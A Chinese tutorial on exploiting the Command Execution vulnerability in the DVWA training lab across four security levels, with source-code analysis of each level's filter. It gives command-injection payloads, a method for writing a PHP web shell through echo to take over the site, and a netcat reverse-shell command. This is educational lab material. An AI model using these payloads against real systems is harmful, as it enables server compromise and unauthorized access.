dvwa靶场Command Execution全难度教程（附带代码分析）

建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场，省去搭建靶场的困扰，但是此靶机靶场较老，并不建议使用

owaspbwa下载地址： OWASP Broken Web Applications Project download | SourceForge.net

注：owaspbwa的本机用户名root密码owaspbwa，记得看看靶机的ip方便以后使用。dvwa的用户名和密码都为admin（owaspbwa中的dvwa是此，其他的用户名为admin密码为password）

1. • Command Execution原理

代码样式	代码作用	适用范围
cmd1 & cmd2	无论1是否执行成功，2将执行
cmd1 | cmd2	无论1是否执行成功，2将执行
cmd1 ; cmd2	无论1是否执行成功，2将执行
cmd1 || cmd2	仅仅在1执行失败后才执行2	linux
cmd1 && cmd2	仅仅在1执行成功后再执行2

注意可以去掉空格，这个只是格式，可以修改变换

2. • Command Execution（Security Level: low）

• • 漏洞判断

访问结果

这里直接告诉我们要输入ip，就直接输入ip看看

输入结果

这里发现直接返回了值就挺不错，可以试试直接使用前文提到的原理去利用

让大家看看，不一样的格式不一样的回显结果

127.0.0.1 & whoami

执行结果

127.0.0.1 | whoami

执行结果

127.0.0.1 ； whoami

执行结果

0.0.0.1 || whoami

执行结果

小技巧：ping不能ping不合法的ip，驶入的ip是不合法的ip

127.0.0.1 && whoami

执行结果

此处选择自己喜欢的样式就行，记得全都要去试试，建议使用'&','|',';'这些更为方便

• • 漏洞利用

• • 一句话木马写入

利用echo直接写入一句话木马

127.0.0.1 & echo ''>shell.php

执行结果

没有回显是正常情况，这个是直接执行，保存文件实在本机目录，直接访问写入的文件名就可以

访问木马结果

此处除数字报错显示为成功，伸下来就蚁剑直接链接就可以，密码为password

拿到网站管理权

• • 反弹shell

我用的是nc反弹命令行windows需要安装netcat然而linux需要知道命令行的应用

nc -e cmd.exe -p 666

或者去看看他的文章吧

(24条消息) Windows下反弹shell的方法_2ed的博客-CSDN博客_metesploit windows 反弹shell payload

Linux是一样的，大同小异

• • 代码分析

'.$cmd.'

'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target ); echo '

'.$cmd.'

'; } } ?>

可以发现此处没有做任何过滤，这里需要有过滤不然很容易拿到管理权

3. • Command Execution（Security Level: medium）

注：我就不过多说了直接payload算了

• • 漏洞利用

127.0.0.1&echo ''>1.php

利用成功

• • 代码分析

 '',
        ';' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '
'.$cmd.'
';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '
'.$cmd.'
';
        
    }
}

?>

这里只过滤了'&&'和';'，过滤不完全不需要技巧绕过

4. • Command Execution（Security Level: high）

• • 漏洞利用

127.0.0.1|whoami

注：此靶场是windows上搭建的会有显示问题，而且这个是过滤了'()'的是只能使用反弹shell进行的

• • 代码分析

 '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "
{$cmd}
";
}

?>

注意'|'后面有空格，这个是有可能会发生的，开发的问题

5. • Command Execution（

此代码是无敌的内有漏洞

• • 代码分析

{$cmd}

"; } else { // Ops. Let the user name theres a mistake echo '

ERROR: You have entered an invalid IP.

'; } } // Generate Anti-CSRF token generateSessionToken(); ?>

这里的代码直接把我们输入的语句的符号过滤再进行数字的拆分，重新拼接成ip再来执行ping命令，没有我们操作的空间